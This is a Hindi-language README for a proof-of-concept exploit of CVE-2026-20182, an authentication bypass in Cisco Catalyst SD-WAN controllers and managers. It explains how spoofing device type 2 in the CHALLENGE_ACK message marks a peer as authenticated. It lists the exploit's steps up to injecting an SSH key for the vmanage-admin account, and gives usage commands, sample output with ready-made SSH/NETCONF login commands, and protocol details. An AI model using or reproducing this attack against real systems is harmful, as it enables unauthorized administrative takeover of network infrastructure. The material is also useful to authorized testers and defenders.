CVE-2026-20182 — Cisco Catalyst SD-WAN नियंत्रक / प्रबंधक प्रमाणीकरण उपेक्षा
CVE-2026-20182 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Cisco Catalyst SD-WAN नियंत्रक (vSmart) और प्रबंधक (vManage) पर vdaemon DTLS सेवा (UDP/12346) में एक गंभीर (CVSS 10.0) प्रमाणीकरण उपेक्षा है।
प्रकटीकरण: 14 मई 2026 Rapid7 (Stephen Fewer & Jonah Burgess) द्वारा
CISA KEV: 14 मई 2026 को जोड़ा गया (आपातकालीन निर्देश 26-03)
CVSS: 10.0 — CWE-287: अनुचित प्रमाणीकरण
भेद्यता
vdaemon सेवा नियंत्रण-प्लेन पीयर्स को प्रमाणित करने के लिए एक बहु-चरणीय DTLS हैंडशेक का उपयोग करती है। vbond_proc_challenge_ack() फ़ंक्शन डिवाइस-प्रकार-विशिष्ट प्रमाणपत्र सत्यापन लागू करता है — लेकिन डिवाइस प्रकार 2 (vHub) में कोई सत्यापन कोड पथ नहीं है। device_type=2 के साथ CHALLENGE_ACK भेजने से फ़ंक्शन हर शर्त को विफल कर देता है और बिना शर्त peer->authenticated = 1 सेट कर देता है।
किसी वैध क्रेडेंशियल, CA-हस्ताक्षरित प्रमाणपत्र, या SD-WAN तैनाती के ज्ञान की आवश्यकता नहीं है।
एक्सप्लॉइट क्या करता है
- लक्ष्य की vdaemon सेवा (UDP/12346) से DTLS 1.2 कनेक्शन स्थापित करता है
- CHALLENGE संदेश (msg_type=8) प्राप्त करता है
- vHub (device_type=2) होने का दावा करते हुए CHALLENGE_ACK भेजता है → पीयर प्रमाणित के रूप में चिह्नित होता है
- HELLO (msg_type=5) भेजता है → पीयर UP स्थिति में परिवर्तित होता है
MSG_VMANAGE_TO_PEER (msg_type=14) के माध्यम से /home/vmanage-admin/.ssh/authorized_keys में एक SSH सार्वजनिक कुंजी इंजेक्ट करता है
vmanage-admin के रूप में NETCONF पहुंच (SSH TCP/830) या SSH पहुंच (TCP/22) प्रदान करता है
उपयोग
python3 cve-2026-20182.py -t <target> [options]
विकल्प
उदाहरण
# एक नई कुंजी जोड़ी उत्पन्न करें और शोषण करें
python3 cve-2026-20182.py -t 192.168.1.100
# मौजूदा सार्वजनिक कुंजी का उपयोग करें
python3 cve-2026-20182.py -t 192.168.1.100 --key-file ~/.ssh/id_rsa.pub
# शोषण करें और NETCONF के माध्यम से सत्यापित करें
python3 cve-2026-20182.py -t 192.168.1.100 --netconf
आउटपुट
[*] Targeting 192.168.1.100:12346 (vdaemon DTLS)
[+] DTLS handshake complete (received msg_type=8, 1027 bytes)
[*] Sending CHALLENGE_ACK with device_type=2 (vHub) ...
[+] peer->authenticated = 1 (authentication bypassed!)
[*] Sending HELLO ...
[+] Peer is UP state (peering handshake bypass successful)
[*] Injecting SSH public key ...
[+] NETCONF: ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa -p 830 [email protected]
[+] SSH: ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa [email protected]
प्रभावित संस्करण
अनुसंधान संदर्भ
तकनीकी विवरण
vdaemon प्रोटोकॉल हेडर 12 बाइट्स का है:
डिवाइस प्रकार: 1=vEdge, 2=vHub, 3=vSmart, 4=vBond, 5=vManage
आवश्यकताएँ
- Python 3.7+
openssl CLI (DTLS परिवहन के लिए)
cryptography लाइब्रेरी (pip install cryptography)
अस्वीकरण
यह एक्सप्लॉइट केवल अधिकृत रेड टीम संचालन, पैठ परीक्षण, और उन सिस्टमों पर सुरक्षा अनुसंधान के लिए है जहाँ आपके पास स्पष्ट लिखित अनुमति है। अनधिकृत उपयोग अवैध है।